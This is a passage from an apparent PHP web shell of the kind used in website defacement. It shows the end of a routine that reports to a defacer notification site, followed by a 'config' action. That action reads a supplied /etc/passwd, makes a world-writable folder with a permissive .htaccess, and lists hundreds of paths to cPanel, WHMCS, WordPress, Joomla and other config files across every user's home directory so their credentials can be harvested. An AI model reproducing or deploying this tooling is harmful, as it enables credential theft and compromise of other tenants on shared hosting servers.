2474. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2475. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
2476. $result = curl_exec($curl);
2477. echo $result;
2478. curl_close($curl);
2479. echo "<br>";
2480. }
2481. }
2482. }
2483.  
2484. elseif($_GET['do'] == 'config') {
2485. if($_POST){
2486. $passwd = $_POST['passwd'];
2487. mkdir("chonx_config", 0777);
2488. $isi_htc = "Options all\nRequire None\nSatisfy Any";
2489. $htc = fopen("chonx_config/.htaccess","w");
2490. fwrite($htc, $isi_htc);
2491. preg_match_all('/(.*?):x:/', $passwd, $user_config);
2492. foreach($user_config[1] as $user_chonx) {
2493. $user_config_dir = "/home/$user_chonx/public_html/";
2494. if(is_readable($user_config_dir)) {
2495. $grab_config = array(
2496. "/home/$user_chonx/.my.cnf" => "cpanel",
2497. "/home/$user_chonx/.accesshash" => "WHM-accesshash",
2498. "/home/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
2499. "/home/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
2500. "/home/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2501. "/home/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
2502. "/home/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
2503. "/home/$user_chonx/public_html/forum/config.php" => "phpBB",
2504. "/home/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
2505. "/home/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
2506. "/home/$user_chonx/public_html/app/etc/local.xml" => "Magento",
2507. "/home/$user_chonx/public_html/admin/config.php" => "OpenCart",
2508. "/home/$user_chonx/public_html/slconfig.php" => "Sitelok",
2509. "/home/$user_chonx/public_html/application/config/database.php" => "Ellislab",
2510. "/home/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
2511. "/home/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
2512. "/home/$user_chonx/public_html/central/configuration.php" => "WHM Central",
2513. "/home/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2514. "/home/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
2515. "/home/$user_chonx/public_html/submitticket.php" => "WHMCS",
2516. "/home/$user_chonx/public_html/configuration.php" => "Joomla",
2517. "/home/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2518. "/home/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
2519. "/home/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2520. "/home/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
2521. "/home/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
2522. "/home/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
2523. "/home/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
2524. "/home/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
2525. "/home/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
2526. "/home/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
2527. "/home/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
2528. "/home/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
2529. "/home/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
2530. "/home/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
2531. "/home/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
2532. "/home/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
2533. "/home/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
2534. "/home/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
2535. "/home/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
2536. "/home/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
2537. "/home/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
2538. "/home/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2539. "/home/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2540. "/home/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
2541. "/home/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
2542. "/home/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
2543. "/home/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
2544. "/home/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
2545. "/home/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
2546. "/home/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
2547. "/home/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
2548. "/home/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
2549. "/home/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
2550. "/home/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
2551. "/home/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2552. "/home/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
2553. "/home/$user_chonx/public_html/wp-config.php" => "WordPress",
2554. "/home/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2555. "/home/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2556. "/home/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2557. "/home/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
2558. "/home/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
2559. "/home/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
2560. "/home/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
2561. "/home/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
2562. "/home/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
2563. "/home/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
2564. "/home/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
2565. "/home/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
2566. "/home/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
2567. "/home/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
2568. "/home/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
2569. "/home/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
2570. "/home/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
2571. "/home/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
2572. "/home/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
2573. "/home/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
2574. "/home/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
2575. "/home/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2576. "/home/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2577. "/home/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
2578. "/home/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
2579. "/home/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
2580. "/home/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
2581. "/home/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
2582. "/home/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
2583. "/home/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
2584. "/home/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
2585. "/home/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
2586. "/home/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
2587. "/home/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
2588. "/home/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2589. "/home/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
2590. "/home1/$user_chonx/.my.cnf" => "cpanel",
2591. "/home1/$user_chonx/.accesshash" => "WHM-accesshash",
2592. "/home1/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
2593. "/home1/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
2594. "/home1/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2595. "/home1/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
2596. "/home1/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
2597. "/home1/$user_chonx/public_html/forum/config.php" => "phpBB",
2598. "/home1/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
2599. "/home1/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
2600. "/home1/$user_chonx/public_html/app/etc/local.xml" => "Magento",
2601. "/home1/$user_chonx/public_html/admin/config.php" => "OpenCart",
2602. "/home1/$user_chonx/public_html/slconfig.php" => "Sitelok",
2603. "/home1/$user_chonx/public_html/application/config/database.php" => "Ellislab",
2604. "/home1/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
2605. "/home1/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
2606. "/home1/$user_chonx/public_html/central/configuration.php" => "WHM Central",
2607. "/home1/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2608. "/home1/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
2609. "/home1/$user_chonx/public_html/submitticket.php" => "WHMCS",
2610. "/home1/$user_chonx/public_html/configuration.php" => "Joomla",
2611. "/home1/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2612. "/home1/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
2613. "/home1/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2614. "/home1/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
2615. "/home1/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
2616. "/home1/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
2617. "/home1/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
2618. "/home1/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
2619. "/home1/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
2620. "/home1/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
2621. "/home1/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
2622. "/home1/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
2623. "/home1/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
2624. "/home1/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
2625. "/home1/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
2626. "/home1/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
2627. "/home1/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
2628. "/home1/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
2629. "/home1/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
2630. "/home1/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
2631. "/home1/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
2632. "/home1/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2633. "/home1/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2634. "/home1/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
2635. "/home1/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
2636. "/home1/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
2637. "/home1/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
2638. "/home1/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
2639. "/home1/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
2640. "/home1/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
2641. "/home1/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
2642. "/home1/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
2643. "/home1/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
2644. "/home1/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
2645. "/home1/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2646. "/home1/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
2647. "/home1/$user_chonx/public_html/wp-config.php" => "WordPress",
2648. "/home1/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2649. "/home1/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2650. "/home1/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2651. "/home1/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
2652. "/home1/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
2653. "/home1/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
2654. "/home1/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
2655. "/home1/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
2656. "/home1/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
2657. "/home1/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
2658. "/home1/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
2659. "/home1/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
2660. "/home1/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
2661. "/home1/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
2662. "/home1/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
2663. "/home1/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
2664. "/home1/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
2665. "/home1/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
2666. "/home1/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
2667. "/home1/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
2668. "/home1/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
2669. "/home1/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2670. "/home1/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2671. "/home1/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
2672. "/home1/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
2673. "/home1/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
2674. "/home1/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
2675. "/home1/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
2676. "/home1/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
2677. "/home1/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
2678. "/home1/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
2679. "/home1/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
2680. "/home1/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
2681. "/home1/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
2682. "/home1/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2683. "/home1/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
2684. "/home2/$user_chonx/.my.cnf" => "cpanel",
2685. "/home2/$user_chonx/.accesshash" => "WHM-accesshash",
2686. "/home2/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
2687. "/home2/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
2688. "/home2/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2689. "/home2/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
2690. "/home2/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
2691. "/home2/$user_chonx/public_html/forum/config.php" => "phpBB",
2692. "/home2/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
2693. "/home2/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
2694. "/home2/$user_chonx/public_html/app/etc/local.xml" => "Magento",
2695. "/home2/$user_chonx/public_html/admin/config.php" => "OpenCart",
2696. "/home2/$user_chonx/public_html/slconfig.php" => "Sitelok",
2697. "/home2/$user_chonx/public_html/application/config/database.php" => "Ellislab",
2698. "/home2/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
2699. "/home2/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
2700. "/home2/$user_chonx/public_html/central/configuration.php" => "WHM Central",
2701. "/home2/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2702. "/home2/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
2703. "/home2/$user_chonx/public_html/submitticket.php" => "WHMCS",
2704. "/home2/$user_chonx/public_html/configuration.php" => "Joomla",
2705. "/home2/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2706. "/home2/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
2707. "/home2/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2708. "/home2/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
2709. "/home2/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
2710. "/home2/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
2711. "/home2/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
2712. "/home2/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
2713. "/home2/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
2714. "/home2/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
2715. "/home2/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
2716. "/home2/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
2717. "/home2/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
2718. "/home2/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
2719. "/home2/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
2720. "/home2/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
2721. "/home2/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
2722. "/home2/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
2723. "/home2/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
2724. "/home2/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
2725. "/home2/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
2726. "/home2/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2727. "/home2/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2728. "/home2/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
2729. "/home2/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
2730. "/home2/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
2731. "/home2/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
2732. "/home2/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
2733. "/home2/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
2734. "/home2/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
2735. "/home2/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
2736. "/home2/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
2737. "/home2/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
2738. "/home2/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
2739. "/home2/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2740. "/home2/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
2741. "/home2/$user_chonx/public_html/wp-config.php" => "WordPress",
2742. "/home2/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2743. "/home2/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2744. "/home2/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2745. "/home2/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
2746. "/home2/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
2747. "/home2/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
2748. "/home2/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
2749. "/home2/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
2750. "/home2/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
2751. "/home2/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
2752. "/home2/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
2753. "/home2/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
2754. "/home2/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
2755. "/home2/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
2756. "/home2/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
2757. "/home2/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
2758. "/home2/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
2759. "/home2/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
2760. "/home2/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
2761. "/home2/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
2762. "/home2/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
2763. "/home2/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2764. "/home2/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2765. "/home2/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
2766. "/home2/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
2767. "/home2/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
2768. "/home2/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
2769. "/home2/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
2770. "/home2/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
2771. "/home2/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
2772. "/home2/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
2773. "/home2/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
2774. "/home2/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
2775. "/home2/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
2776. "/home2/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2777. "/home2/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
2778. "/home3/$user_chonx/.my.cnf" => "cpanel",
2779. "/home3/$user_chonx/.accesshash" => "WHM-accesshash",
2780. "/home3/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
2781. "/home3/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
2782. "/home3/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2783. "/home3/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
2784. "/home3/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
2785. "/home3/$user_chonx/public_html/forum/config.php" => "phpBB",
2786. "/home3/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
2787. "/home3/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
2788. "/home3/$user_chonx/public_html/app/etc/local.xml" => "Magento",
2789. "/home3/$user_chonx/public_html/admin/config.php" => "OpenCart",
2790. "/home3/$user_chonx/public_html/slconfig.php" => "Sitelok",
2791. "/home3/$user_chonx/public_html/application/config/database.php" => "Ellislab",
2792. "/home3/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
2793. "/home3/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
2794. "/home3/$user_chonx/public_html/central/configuration.php" => "WHM Central",
2795. "/home3/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2796. "/home3/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
2797. "/home3/$user_chonx/public_html/submitticket.php" => "WHMCS",
2798. "/home3/$user_chonx/public_html/configuration.php" => "Joomla",
2799. "/home3/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2800. "/home3/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
2801. "/home3/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2802. "/home3/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
2803. "/home3/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
2804. "/home3/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
2805. "/home3/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
2806. "/home3/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
2807. "/home3/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
2808. "/home3/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
2809. "/home3/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
2810. "/home3/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
2811. "/home3/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
2812. "/home3/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
2813. "/home3/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
2814. "/home3/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
2815. "/home3/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
2816. "/home3/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
2817. "/home3/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
2818. "/home3/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
2819. "/home3/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
2820. "/home3/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2821. "/home3/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2822. "/home3/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
2823. "/home3/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
2824. "/home3/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
2825. "/home3/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
2826. "/home3/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
2827. "/home3/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
2828. "/home3/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
2829. "/home3/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
2830. "/home3/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
2831. "/home3/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
2832. "/home3/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
2833. "/home3/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2834. "/home3/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
2835. "/home3/$user_chonx/public_html/wp-config.php" => "WordPress",
2836. "/home3/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2837. "/home3/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2838. "/home3/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2839. "/home3/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
2840. "/home3/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
2841. "/home3/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
2842. "/home3/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
2843. "/home3/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
2844. "/home3/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
2845. "/home3/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
2846. "/home3/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
2847. "/home3/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
2848. "/home3/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
2849. "/home3/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
2850. "/home3/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
2851. "/home3/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
2852. "/home3/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
2853. "/home3/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
2854. "/home3/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
2855. "/home3/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
2856. "/home3/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
2857. "/home3/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2858. "/home3/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2859. "/home3/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
2860. "/home3/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
2861. "/home3/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
2862. "/home3/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
2863. "/home3/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
2864. "/home3/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
2865. "/home3/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
2866. "/home3/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
